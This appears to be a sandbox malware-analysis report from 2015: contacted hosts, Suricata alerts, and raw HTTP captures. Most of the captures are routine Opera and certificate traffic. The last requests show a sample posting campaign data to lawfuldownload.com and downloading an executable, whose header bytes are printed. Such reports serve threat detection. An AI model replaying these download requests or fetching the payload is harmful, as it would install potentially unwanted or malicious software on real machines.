hxxp://net.geo.opera.com/opera/stable?utm_source=winnersolution&utm_medium=pb&utm_campaign=1png 82.145.215.19
hxxp://www.lawfuldownload.com/tdownload1.php 54.235.206.28
hxxp://s1.symcb.com/pca3-g5.crl 23.37.37.163
hxxp://evcs-crl.ws.symantec.com/evcs.crl 23.37.37.163
hxxp://crl3.digicert.com/sha2-ha-server-g3.crl 93.184.220.29
hxxp://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl 66.225.197.197
hxxp://www.lawfuldownload.com/thankyou.php 54.235.206.28
hxxp://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootseq.txt 213.133.184.106
hxxp://crl.verisign.com/pca3-g5.crl 23.37.37.163
hxxp://crl3.digicert.com/DigiCertGlobalRootCA.crl 93.184.220.29
duckduckgo.com 176.34.155.20
search.yahoo.com 188.125.66.104


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET MALWARE Possible Windows executable sent when remote host claims to send a Text File
ET MALWARE SoundCloud Downloader Install Beacon
ET TROJAN VMProtect Packed Binary Inbound via HTTP - Likely Hostile
ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected

Traffic

GET /gs/gsorganizationvalsha2g2.crl HTTP/1.1
Accept: */*
User-Agent: Microsoft-CryptoAPI/5.131.2600.5512
Host: crl.globalsign.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache


HTTP/1.1 200 OK
Date: Sat, 19 Dec 2015 19:25:13 GMT
Content-Type: application/pkix-crl
Content-Length: 43300
Connection: keep-alive
Set-Cookie: __cfduid=dc9f784b236204bd8b8cd3fc992fc2c5d1450553113; expires=Sun, 18-Dec-16 19:25:13 GMT; path=/; domain=.globalsign.com; HttpOnly
ETag: E28B
Expires: Sat, 26 Dec 2015 00:00:00 GMT
Last-Modified: Sat, 19 Dec 2015 00:00:00 GMT
Cache-Control: public, max-age=534887
X-Cache: Miss from cloudfront
Via: 1.1 c77b51ad135b3319a54e2e40de778962.cloudfront.net (CloudFront)
X-Amz-Cf-Id: j-THNz1OSZv_BJTKMGtOGUyEq4CP5kPWFysC8Rs5RiQzWHbKqDzN7Q==
CF-Cache-Status: HIT
Accept-Ranges: bytes
Server: cloudflare-nginx
CF-RAY: 25757e0202232b52-AMS
0.. 0......0...*.H........0f1.0...U....BE1.0...U....GlobalSign nv-sa1&
lt;0:..U...3GlobalSign Organization Validation CA - SHA256 - G2..15121
9000000Z..151226000000Z0..90#...![.|.}...cX-}..7...140409063512Z0#...!
......C&.7..=.....140409085719Z0#...!:."...../;@N..Y...140409085721Z0#
...!2....m..O.F.......140409085723Z0#...!..; .Lk6.>".......14040908
5725Z0#...!.-#..#-.HZ... k...140409085727Z0#...!{*n.....{...g.....1404
09232423Z0#...!..............P...140410091319Z0#...!..LA.)."aI..6.....
140410120318Z0#...!."..t.s......'....140410121332Z0#...!..e8....&]....
.2..140410121334Z0#...!-.......S5.;......140410181318Z0#...!....P.....
/...6...140410231318Z0#...!T...V...8g.Qy..r..140410231320Z0#...!.=.4..
"...A...i...140410231322Z0#...!mM....0...p....N..140411095739Z0#...!..
.n..P..f........140411095741Z0#...!..f..Rg.....`..F..140411095743Z0#..
.!..z.N...Uj....cX..140411095745Z0#...!s..G.\p..V.r......140411163506Z
0#...!#.;Q4....!...C....140411173507Z0#...!P.....c2.Q .4J.(..140414073
521Z0#...!.]....Q.M.Iu...G..140414131158Z0#...!.....Q5t.!.t......14041
6123512Z0#...!..........U...}...140416123514Z0#...!.y.J.i%...Y>M.f.
..140416123525Z0#...!....RRj%.!.!..J...140416123527Z0#...!.'.@...2...$
... ..140416123530Z0#...!@M.x.Aw..n.:=.....140416123532Z0#...!O.,.uG..
....].n...140416123534Z0#...!.,.....7.r..(V....140416123536Z0#...!...5
.....FQ}..l...140416123538Z0#...!\x...].........B..140416123540Z0#...!
...........o.J.v..140416123542Z0#...!.....?g..C!t...$..140416123544Z0#
...!.#4I.Q.S..........140416123546Z0#...!.GGC....@..=.V....1404161
<<< skipped >>>


GET /favicon.ico HTTP/1.1
Host: VVV.google.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.73 Safari/537.36 OPR/34.0.2036.41
Accept-Encoding: gzip, deflate, lzma, sdch
Accept-Language: en-US,en;q=0.8


HTTP/1.1 200 OK
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Type: image/x-icon
Date: Tue, 15 Dec 2015 23:24:39 GMT
Expires: Wed, 23 Dec 2015 23:24:39 GMT
Last-Modified: Tue, 01 Sep 2015 16:35:46 GMT
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 1517
X-XSS-Protection: 1; mode=block
Age: 331231
Cache-Control: public, max-age=691200
...........Xip.U.~.......Ye.@.X.BB(D..p.. .... ..VI.XE.@.A...@.H...d..
....I@.r.Bb.K..f..{d....3a...............{._.e..{.%&2.Lb..0..1....]..9
\.".%....2ua1.@r0.\....W.:...P.........!.q......m%}........;8....`....
...V[.6.[.qD.C......}../.o.9;,.9.....W..x..DY.07.......E.4...#o.(8...]
0...d....g-./.x...#.a..Zn....z8.........Uc...@./.k...M.>..4wm....me
..=........h..e.........\....w?...k....@k...S~. a......:..9..1y.~8.G.8
...I8{.g.kh...A?z.zC.....7%.:.....8S..9.kM....m.....E..~...])..t....g.
sh..j.L..}T..h..S>.c..F...a..vl*q....JZ...KP....<.V.K.H....V..e.
&...^.UtflQ.0."U.l...L......$...%..9OT.P.Y..!I.Q.2.xzt.I........s.>
....u.....K.o9g....q../.PW..sMGq..8.......9#.......n#.T.....rM.(I...iX
xh..jV....,..|\/.1n.v...V....%.L..-.yx&....c0......hs...L.6$.\-S^Jk...
.n=p...ni....UyjQ.~...oe.Q.K..?/...k.L}..7................}......oH..e
...%.\....{S.....1...]cp.V.n<*]kn@q.t....ke:B......2...=.... t.s.LF
........e..l.U...T.zp.L...;.n.n..3..{.._..[ll.B.........z=^...je.\....
q....[<....{.3../.. ......%'........}.n......((]....*E|:."..T.?..R.
.M"...3c_.U...>O..."...i.`u._...>.....Rd.......<...._{D.....v
*r........@tR._......'W.......{. |..&ie.y..z....-.....6....AG..I......
.' .......hm..xz@NWl."....*.O..........b.c'7........^....]..x..5....w.
B/;.1..d..c.z'...`G......2Z...V.:l...^K.?.E..[\.1......./7...sy..Ky.2Z
?..x..F.<.f.]cvO..>.{.hs.N._,n...b.....Zd..lI..A...b .u.c...}...
$..S...6..Ys..n....4..J_...[..n.:JJ...[$...lq_<$....h..8rA{.P.Q1p..
.R_.Q\.8zR.V..'.....`Sd..O.n.~Q.....cC..{..X.k.u.`.3.".:.?l.....|.
<<< skipped >>>


GET /speeddials/partner/ebay_us?ab_tests=DNA-45706-2-group:DNA-45706-2 HTTP/1.1
Host: redir.opera.com
Connection: keep-alive
CH: dw=264, dh=168, dpr=1.000000
X-Purpose: preview
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.73 Safari/537.36 OPR/34.0.2036.41
Accept-Encoding: gzip, deflate, lzma, sdch
Accept-Language: en-US,en;q=0.8


HTTP/1.1 302 Found
Server: Apache/2.2.16 (Debian)
Location: hXXp://redir.opera.com/previews/images/ebay_us/sd_264x168.png
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Type: text/plain
Content-Length: 26
Date: Sat, 19 Dec 2015 19:25:16 GMT
X-Varnish: 2871789005
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS
..............................


GET /speeddials/partner/priceline_com?ab_tests=DNA-45706-2-group:DNA-45706-2 HTTP/1.1


Host: redir.opera.com
Connection: keep-alive
CH: dw=264, dh=168, dpr=1.000000
X-Purpose: preview
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.73 Safari/537.36 OPR/34.0.2036.41
Accept-Encoding: gzip, deflate, lzma, sdch
Accept-Language: en-US,en;q=0.8


HTTP/1.1 302 Found
Server: Apache/2.2.16 (Debian)
Location: hXXp://redir.opera.com/previews/images/priceline_com/sd_264x168.png
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Type: text/plain
Content-Length: 26
Date: Sat, 19 Dec 2015 19:25:17 GMT
X-Varnish: 2871789060
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS
..............................


GET /speeddials/partner/bestbuy_com?ab_tests=DNA-45706-2-group:DNA-45706-2 HTTP/1.1


Host: redir.opera.com
Connection: keep-alive
CH: dw=264, dh=168, dpr=1.000000
X-Purpose: preview
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.73 Safari/537.36 OPR/34.0.2036.41
Accept-Encoding: gzip, deflate, lzma, sdch
Accept-Language: en-US,en;q=0.8


HTTP/1.1 302 Found
Server: Apache/2.2.16 (Debian)
Location: hXXp://redir.opera.com/previews/images/bestbuy_com/sd_264x168.png
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Type: text/plain
Content-Length: 26
Date: Sat, 19 Dec 2015 19:25:17 GMT
X-Varnish: 2871789101
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS
..............................


GET /previews/images/ebay_us/sd_264x168.png HTTP/1.1


Host: redir.opera.com
Connection: keep-alive
CH: dw=264, dh=168, dpr=1.000000
X-Purpose: preview
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.73 Safari/537.36 OPR/34.0.2036.41
Accept-Encoding: gzip, deflate, lzma, sdch
Accept-Language: en-US,en;q=0.8


HTTP/1.1 200 OK
Server: Apache/2.2.16 (Debian)
Last-Modified: Thu, 17 Dec 2015 12:28:02 GMT
ETag: "149836-1043-527172761b880"
Content-Type: image/png
Content-Length: 4163
Date: Sat, 19 Dec 2015 19:25:17 GMT
X-Varnish: 2871789126 2871666984
Age: 283
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: HIT
X-Varnish-Cache-Hits: 336
.PNG........IHDR.....................IDATx...1.. ..Q..FS.B......4...;.
.}W...&..c.1..`.0.......c.1..`.0.`.0.......c.1..`.0.......c...c.1..`.0
.......c.1..`...`.0.......cl..v.uY.=0.................................
............`.w&.QUk...3N...c...o.:.....(".(.....:....e...A.....;.%.IX
.AB.!$.t.....^o...G...9_..{;f...W...N........-..)..$I..`..U...B..9...W
V.v.,.....i.#..8W@..o..Y.$.,y..;Otd.M'EW..).....R...`......w.u..c.....
.L..m..}.6t.k.T..=|yE...E.lMpE.....O.X~.D.../...1..M-}~^.{...d8k....!\
.`...&3Y..G....C...H.<z....-.F.&.BP.....W.x.,..|.D.n.!o{W...N..(6.&
...7..j$n.....V....1..m.U...[.u.S....K....X<.P.(....Sb#Q...........
..E..?.....4.[ ........W.....e.a.!...#..._.k .&.......X.`....9Go!...;}
!.......|...E.h-..k.3/..p..8 ......$..h.q.Z.p.}....E....`.C....[4....O
..Y..%.b........-w..J..{....kZ....."R0.....Z...6e..xS.I0....&.P..YF..v
v.....w.P0Z.=_`....U...e. .;#..m.7..TO.?t..-..J0v.._..Z....XU.gE..kR..
5jWy.M..........)....{z........%>..)..v.}...[.*.}..].M....u.g0.Z.2/
...o.F....N..4M%...(#.O.1.8~.yO^sf....:|B.5.Q......... Q..............
..v...W_.../z.p.........7...F~.&.[..<..............\Y...B.g........
.....E......E..aO.,.;...[.3.......J..._._..h...".y...;...4&....un$..m!
....s.......)dA.,Y...{6..>R0..P..f..;N...k.{jO1..:p.`T..'.r8...`({0
2g......U....[..X<......5......`.._...^lW.......dc.9.@r..w.x.2.....
Vj.wR.%.........LZO...]Vg>.;...bY.......D.|.%."r*..:Xlrh...h....KT.
.T.Z0*p........%...........e1..p.%..H3...`N#...N..a 2..k.`\....,\8-h..
e.....w~7Y%.IE^E. .......w.i.. ...M.Jg ..:.*1.Q8nS. d...L.><
<<< skipped >>>

GET /previews/images/youtube_other/sd_264x168.png HTTP/1.1


Host: redir.opera.com
Connection: keep-alive
CH: dw=264, dh=168, dpr=1.000000
X-Purpose: preview
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.73 Safari/537.36 OPR/34.0.2036.41
Accept-Encoding: gzip, deflate, lzma, sdch
Accept-Language: en-US,en;q=0.8


HTTP/1.1 200 OK
Server: Apache/2.2.16 (Debian)
Last-Modified: Thu, 17 Dec 2015 12:28:02 GMT
ETag: "14a691-ea1-527172761b880"
Content-Type: image/png
Content-Length: 3745
Date: Sat, 19 Dec 2015 19:25:17 GMT
X-Varnish: 2871789146 2871781292
Age: 26
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: HIT
X-Varnish-Cache-Hits: 68
.PNG........IHDR....................hIDATx...... ..../............b.. 
...b.. ...b.. ...b.b.. ...b.. ...b.. ...b.... ...b.. ...b.. ...b.... .
..b.. ..Aorv.{...e.......7....;...T<[.$...-..T.< E.....@.F..L.R.
.....b.@... 0....8.p..9......5....C..Z....~..q}.}..Y.Z.UU.............
.>.|......}..RR......j7o.n..]..&f....4Q.W...Z..*<.jixU....0.....
.z=t.}.O.[p#n..$<.z....U..?._Q.f.v.....k.l.....tgc..M............}.
.......Cqq.Fcnk.Z...@....1.....c....O6 ....-.2.x............T.g^... .`
..cY..g0...........e.c."n|.K&M.#...OV....`k=.#.....^....[.....^.kc.1..
}._..#../ZC...@.......2}f..#.}.X.F0..b..A..t.{%..b..WLw..G.r..v...~...
....w...D....3/.c}. T.&....y..qb*.J....O.[:::<...m..n.#....DG?.@...
.....k.@......{...=$xtt..^S]M...y.l6{ .*.i.?.t. x.r.....*..SS.........
.#6.........#....>L. .Uz.u.....`8.-....1l.....^RR.P.h.B*>s......
A..9Gr..a..i...=iiT....<...|..G...<..$f3..y.........)....Qe^^.U.
...<.p...p..v.`0z...<......x.`0....;(.....L0J..3..9.[1...l.2....
.. {- ...j..R..k2gwp .z./.....t...&...l...F..:u.F.....5....<....4q.
.#......>.<..>!AJ..`.-F#.a....C.../<..m.L0.r.1..xOM...ksf.
.q..j..D.ZE.........2..x.o.1....Y..G..v......g...x.....=.. .G...k.....
ª}W.....U..R...{.oYS.N.>|..=.8...^.....)U.....^...,hN.......Kob..
.....S...4...........(..q...Mo.6v..(.S:e....*.. ..25..=.=u..'....t...o
epv..q....2n.3!55..q..Y:........S.......{..%&$...g..4k...4......%...F.
..T,hj....f}.B0...;..._../{c&.R....V..b.....xE?....1....-[h(.....v..?.
.....?.r.F....cV..on....C.....156H..t...\f.9.X^&..#Y.k.....E....t.
<<< skipped >>>

GET /previews/images/twitter_us/sd_264x168.png HTTP/1.1


Host: redir.opera.com
Connection: keep-alive
CH: dw=264, dh=168, dpr=1.000000
X-Purpose: preview
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.73 Safari/537.36 OPR/34.0.2036.41
Accept-Encoding: gzip, deflate, lzma, sdch
Accept-Language: en-US,en;q=0.8


HTTP/1.1 200 OK
Server: Apache/2.2.16 (Debian)
Last-Modified: Thu, 17 Dec 2015 12:28:02 GMT
ETag: "14a1af-681-527172761b880"
Content-Type: image/png
Content-Length: 1665
Date: Sat, 19 Dec 2015 19:25:17 GMT
X-Varnish: 2871789175 2871731953
Age: 155
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: HIT
X-Varnish-Cache-Hits: 58
.PNG........IHDR............. C.....gPLTE......d......................
....~........p..............&.. ................................2.....
...i..%........t........U..............X...........,..k...........$..b
.....q.....u..............@..J..'..?..G........H..v.....\.....Q.....P.
....E.....R.....e../.................#..y.....l..F....................
...............4..5..............f.................V.._.....x.....[...
..)..S.. .................C.....1..............W.....;...........*....
.......M..............r..7.........................................|..
......K.....!..n........0..o..Z.....{..B.................3.....D......
.....w..T..(..............1..c....IDATx......@...w..w=v@............&l
t;j.c.}..A^.~EUFq..U".J....P.R.%.z...2.....6...!*3j. ."i.A... .L..j..F
iw..Q-..q...y......~....VLZ.R.\.q...0...0..F......hw.9..a.a..Y.#..\q.l
..@.{..-ss..<?..._`..,.s...a.B.....`..d. .4....P. ...!.'..a.E$..C.#
..H..4K9,P.%..RE.c.g./..AE9Ud,.....d%/.Tr..*V...~...' H%.W..uD......%5
...zH..W....=E.....$...qDQ....6l..Q6p..>.."1.K.C.-...mH.i.....y.Wsm
...........XM.~.....<.q.y...7#.=TT..<......q..T........}...jv@..
L$i....E.y."y......G.^....|..5......|fA.<^_N....T..P]u...b.wS.lH.=.
....O'$.{._......M..d......6.....pX.3...B.........UC.U....t..z.A....].
U..V.A.c..)......}..@..C.u.&p..M... !..4j.....P..7.....-.......m..*2ct
.CH.._..O...}...Q.........P....~..N..X.L0.N55...G.P....EGN..5t"0.c.D..
.9..9aS.0..nN..F.e.W....a..7...,..n...=.`....n<TGU=0......E`..3T...
.......a*w..UY50.....r..P..~.:..0....,...........h..V..._N......5.
<<< skipped >>>


GET /?host=redir.opera.com&hdn=H0WKpMbVXsif0I8OJoRVZA== HTTP/1.1
Host: sitecheck2.opera.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.73 Safari/537.36 OPR/34.0.2036.41
Accept-Encoding: gzip, deflate, lzma


HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=7200
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Type: text/xml
Content-Length: 163
Accept-Ranges: bytes
Date: Sat, 19 Dec 2015 19:25:18 GMT
X-Varnish: 1022600188 1022480500
Age: 39
Via: 1.1 varnish
X-Served-By: n16-05-08
X-Varnish-Cache: HIT
X-Varnish-Cache-Hits: 1693
..........M....0.D............'x#......d[D....z.......q..H....:W"C.B..
{!.t..Di..&$.h.....#...,.&,DDK.#.S..9.@.b2.....Z..mO.Z..06....L:4..R Y
.]......N|...y.>.......HTTP/1.1 200 OK..Server: Apache..Cache-Contr
ol: max-age=7200..Vary: Accept-Encoding..Content-Encoding: gzip..Conte
nt-Type: text/xml..Content-Length: 163..Accept-Ranges: bytes..Date: Sa
t, 19 Dec 2015 19:25:18 GMT..X-Varnish: 1022600188 1022480500..Age: 39
..Via: 1.1 varnish..X-Served-By: n16-05-08..X-Varnish-Cache: HIT..X-Va
rnish-Cache-Hits: 1693............M....0.D............'x#......d[D....
z.......q..H....:W"C.B..{!.t..Di..&$.h.....#...,.&,DDK.#.S..9.@.b2....
.Z..mO.Z..06....L:4..R Y.]......N|...y.>.........



GET /s/a/bing_p.ico HTTP/1.1
Host: VVV.bing.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.73 Safari/537.36 OPR/34.0.2036.41
Accept-Encoding: gzip, deflate, lzma, sdch
Accept-Language: en-US,en;q=0.8


HTTP/1.1 200 OK
Cache-Control: public, max-age=15552000
Content-Type: image/x-icon
Last-Modified: Sat, 19 Oct 2013 01:08:06 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/8.5
Date: Sat, 19 Dec 2015 19:25:10 GMT
Content-Length: 1150
............ .h.......(....... ..... .....@...........................
......................................................................
......................................................................
LVZ.G\e.................................................3u..PPP.PPP.PP
P.PPP.:m..........................................Bbn.3w..OQR.PPP.PPP.
PPP.NRS. ...................................PPP.E^g.....4t..PPQ.PPP.PP
P.PPP.G\c.............................PPP.PPP.Cam.........9n..PPP.PPP.
PPP.PPP.........................PPP.PPP.PPP.............6r..PPP.PPP.PP
P.........................PPP.PPP.PPP.........LUY.PPP.PPP.PPP.PPP.....
....................PPP.PPP.PPP.....1y..PPP.PPP.G\d..|................
..............PPP.PPP.PPP.....?gv.(...................................
........PPP.PPP.PPP...................................................
..PPP.PPP.F]e.....................................................PPP.
Cal.'.................................................................
......................................................................
......................................NT..IE..In..l6..Fa..ly.. M..el..
5 ..ep..ng.., ..nu..eI..el..ROHTTP/1.1 200 OK..Cache-Control: public, 
max-age=15552000..Content-Type: image/x-icon..Last-Modified: Sat, 19 O
ct 2013 01:08:06 GMT..Vary: Accept-Encoding..Server: Microsoft-IIS/8.5
..Date: Sat, 19 Dec 2015 19:25:10 GMT..Content-Length: 1150...........
... .h.......(....... ..... .....@....................................
..................................................................
<<< skipped >>>


GET /pca3-g5.crl HTTP/1.1
Accept: */*
User-Agent: Microsoft-CryptoAPI/5.131.2600.5512
Host: crl.verisign.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache


HTTP/1.1 200 OK
Server: Apache
ETag: "7815f750de32498f5b74e8e2036c6131:1449630201"
Last-Modified: Wed, 09 Dec 2015 02:48:37 GMT
Date: Sat, 19 Dec 2015 19:24:57 GMT
Content-Length: 533
Connection: keep-alive
Content-Type: application/pkix-crl
0...0..0...*.H........0..1.0...U....US1.0...U....VeriSign, Inc.1.0...U
....VeriSign Trust Network1:08..U...1(c) 2006 VeriSign, Inc. - For aut
horized use only1E0C..U...<VeriSign Class 3 Public Primary Certific
ation Authority - G5..151207000000Z..160331235959Z0...*.H.............
@.{....?..A....R9............j..#b..h.q\.........r...{.............'..
.t7...<..H......'F..Y..e.F..a..3..]..}.}1[...........)U.zDE..J.q[&.
..a..Ci|.^J.fQ.-..3........R...g.......Hh..m.v...K..w....:..8....-!.7.
.....;K.....W..:....W8HR]VgS@...~...N.!.Dc..)..s.HTTP/1.1 200 OK..Serv
er: Apache..ETag: "7815f750de32498f5b74e8e2036c6131:1449630201"..Last-
Modified: Wed, 09 Dec 2015 02:48:37 GMT..Date: Sat, 19 Dec 2015 19:24:
57 GMT..Content-Length: 533..Connection: keep-alive..Content-Type: app
lication/pkix-crl..0...0..0...*.H........0..1.0...U....US1.0...U....Ve
riSign, Inc.1.0...U....VeriSign Trust Network1:08..U...1(c) 2006 VeriS
ign, Inc. - For authorized use only1E0C..U...<VeriSign Class 3 Publ
ic Primary Certification Authority - G5..151207000000Z..160331235959Z0
...*.H.............@.{....?..A....R9............j..#b..h.q\.........r.
..{.............'...t7...<..H......'F..Y..e.F..a..3..]..}.}1[......
.....)U.zDE..J.q[&...a..Ci|.^J.fQ.-..3........R...g.......Hh..m.v...K.
.w....:..8....-!.7......;K.....W..:....W8HR]VgS@...~...N.!.Dc..)..s...
<<< skipped >>>


GET /ss.crl HTTP/1.1
Accept: */*
User-Agent: Microsoft-CryptoAPI/5.131.2600.5512
Host: ss.symcb.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache


HTTP/1.1 200 OK
Server: Apache
ETag: "b03eba7a0646af6d2a8b4d3c796b5201:1450517597"
Last-Modified: Sat, 19 Dec 2015 09:01:13 GMT
Date: Sat, 19 Dec 2015 19:25:12 GMT
Transfer-Encoding:  chunked
Connection: keep-alive
Connection: Transfer-Encoding
Content-Type: application/pkix-crl
00006000..0....0.......0...*.H........0~1.0...U....US1.0...U....Symant
ec Corporation1.0...U....Symantec Trust Network1/0-..U...&Symantec Cla
ss 3 Secure Server CA - G4..151219090109Z..151226090109Z0....0!.....@.
.....?..#....150902191930Z0!......X.3..*..k(....150806152406Z0!.......
..J.N.h......150217135549Z0!....,.....f....^....150611233753Z0!.......
.....XW.M....150816010821Z0!......|%A=).K.`.&...151211011023Z0!....Q8*
.|..]6.".4...150330080110Z0!.....!!..O..........151124201031Z0!....eL.
Y icf}.:..N..140508200907Z0!.......>..z(L..0i...150517010832Z0!....
.!.A:...(s......151105180048Z0!.....`..*........^..150820083926Z0!....
..h...Z..Y.quJ..150813151839Z0!.........^... .M.'..150316171756Z0!....
.(..X..U...I....150318135037Z0!.....^....J...%X....150824025647Z0!....
........HOXyX ..151028193859Z0!.......(.s..r....A..150912015711Z0!....
...n....[...6a..140729211122Z0!.....Z...k1S.<.. I..150727184447Z0!.
..#zb...5...T\!....150318170750Z0!...#..9....:^.[Kh0..150411141836Z0!.
..%..8..l..Ph.5....150605090026Z0!...%.vu..;..r*y..E..150802010744Z0!.
..&P'.s....... ....150413124959Z0!...&....5./C...c....150310141723Z0!.
..(M`...@O.........151026064509Z0!...).......0^.B.....151102010800Z0!.
..*>_l....... .....150915102058Z0!...*.4O.g.N.i0...I..151202175758Z
0!...,Cg@[|.{.c.......151020203229Z0!...,...[U.F0....n...150728152025Z
0!.../-....4.."..9....150601162325Z0!.../..J.y>D.h.c..w..1412040417
53Z0!...0..,&.3.....)....151211002355Z0!...0.b.)L..^...!zD..1509081809
55Z0!...0....7/....).D`..151109123905Z0!...1..2N..&.}Xp..!..150428
<<< skipped >>>


GET /gs/gsorganizationvalsha2g2.crl HTTP/1.1
Accept: */*
User-Agent: Microsoft-CryptoAPI/5.131.2600.5512
Host: crl.globalsign.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache


HTTP/1.1 200 OK
Date: Sat, 19 Dec 2015 19:25:13 GMT
Content-Type: application/pkix-crl
Content-Length: 43300
Connection: keep-alive
Set-Cookie: __cfduid=d1e450303292d3d236a7cdd5959bdd1681450553113; expires=Sun, 18-Dec-16 19:25:13 GMT; path=/; domain=.globalsign.com; HttpOnly
ETag: E28B
Expires: Sat, 26 Dec 2015 00:00:00 GMT
Last-Modified: Sat, 19 Dec 2015 00:00:00 GMT
Cache-Control: public, max-age=534887
X-Cache: Miss from cloudfront
Via: 1.1 c77b51ad135b3319a54e2e40de778962.cloudfront.net (CloudFront)
X-Amz-Cf-Id: j-THNz1OSZv_BJTKMGtOGUyEq4CP5kPWFysC8Rs5RiQzWHbKqDzN7Q==
CF-Cache-Status: HIT
Accept-Ranges: bytes
Server: cloudflare-nginx
CF-RAY: 25757e01b4b300dd-AMS
0.. 0......0...*.H........0f1.0...U....BE1.0...U....GlobalSign nv-sa1&
lt;0:..U...3GlobalSign Organization Validation CA - SHA256 - G2..15121
9000000Z..151226000000Z0..90#...![.|.}...cX-}..7...140409063512Z0#...!
......C&.7..=.....140409085719Z0#...!:."...../;@N..Y...140409085721Z0#
...!2....m..O.F.......140409085723Z0#...!..; .Lk6.>".......14040908
5725Z0#...!.-#..#-.HZ... k...140409085727Z0#...!{*n.....{...g.....1404
09232423Z0#...!..............P...140410091319Z0#...!..LA.)."aI..6.....
140410120318Z0#...!."..t.s......'....140410121332Z0#...!..e8....&]....
.2..140410121334Z0#...!-.......S5.;......140410181318Z0#...!....P.....
/...6...140410231318Z0#...!T...V...8g.Qy..r..140410231320Z0#...!.=.4..
"...A...i...140410231322Z0#...!mM....0...p....N..140411095739Z0#...!..
.n..P..f........140411095741Z0#...!..f..Rg.....`..F..140411095743Z0#..
.!..z.N...Uj....cX..140411095745Z0#...!s..G.\p..V.r......140411163506Z
0#...!#.;Q4....!...C....140411173507Z0#...!P.....c2.Q .4J.(..140414073
521Z0#...!.]....Q.M.Iu...G..140414131158Z0#...!.....Q5t.!.t......14041
6123512Z0#...!..........U...}...140416123514Z0#...!.y.J.i%...Y>M.f.
..140416123525Z0#...!....RRj%.!.!..J...140416123527Z0#...!.'.@...2...$
... ..140416123530Z0#...!@M.x.Aw..n.:=.....140416123532Z0#...!O.,.uG..
....].n...140416123534Z0#...!.,.....7.r..(V....140416123536Z0#...!...5
.....FQ}..l...140416123538Z0#...!\x...].........B..140416123540Z0#...!
...........o.J.v..140416123542Z0#...!.....?g..C!t...$..140416123544Z0#
...!.#4I.Q.S..........140416123546Z0#...!.GGC....@..=.V....1404161
<<< skipped >>>


POST /namen.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: VVV.lawfuldownload.com
Content-Length: 59
Connection: Keep-Alive

campid=14991&i=OperaWW&prefix=amisetup9364&version=1.1.2.41
HTTP/1.1 200 OK
Content-Type: text/plain; charset=UTF-8
Date: Sat, 19 Dec 2015 19:24:05 GMT
Server: Apache/2.2.15 (Red Hat)
X-Powered-By: PHP/5.3.3
Content-Length: 174
Connection: keep-alive
[Data]..exe=amisetup9364.exe..url=hXXp://VVV.lawfuldownload.com/tdownl
oad1.php..params=version=1.1.2.41&s1=fb47c20c3bfafa95a95f9b56a36c42e5f
d1ffef3&t1=1450553225&campid=14991....


POST /tdownload1.php HTTP/1.1


Content-Type: application/x-www-form-urlencoded
Host: VVV.lawfuldownload.com
Content-Length: 107
Connection: Keep-Alive

version=1.1.2.41&s1=fb47c20c3bfafa95a95f9b56a36c42e5fd1ffef3&t1=1450553225&campid=14991&prefix=amisetup9364
HTTP/1.1 200 OK
Access-Control-Allow-Origin: *
Access-Control-Expose-Headers: X-Target-FN
Content-Disposition: attachment; filename="amisetup9364__14991.exe"
Content-Type: application/x-msdownload
Date: Sat, 19 Dec 2015 19:24:05 GMT
Server: Apache/2.2.15 (Red Hat)
X-Powered-By: PHP/5.3.3
X-Target-FN: amisetup9364__14991.exe
Content-Length: 754688
Connection: keep-alive
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$........%...D...D..
.D..s.@..D..s.B..D..s.A..D...<...D...<...D...D...D....\..D....F.
.D...D...D....C..D..Rich.D..........PE..L.....uV......................
......L.............@.......................................@.........
............................d....p..4 ......................|.........
..........................h...@...............L.......................
.....text............................... ..`.rdata...b.......d........
..........@..@.data....1...0......................@....rsrc...4 ...p..
."...(..............@..@.reloc...9.......:...J..............@..B......
......................................................................
......................................................................
......................................................................
......................................................................
..............................................................P....0PA
.............................D$....D$..A.....................Q.V.t$...
........^..............T$..L$..........3...............D$.V.p....0.t$.
.......^........Q.t$........t..t$........Y...2.Y.................t$...
.....t..t$....t$.........2................V.........^.................
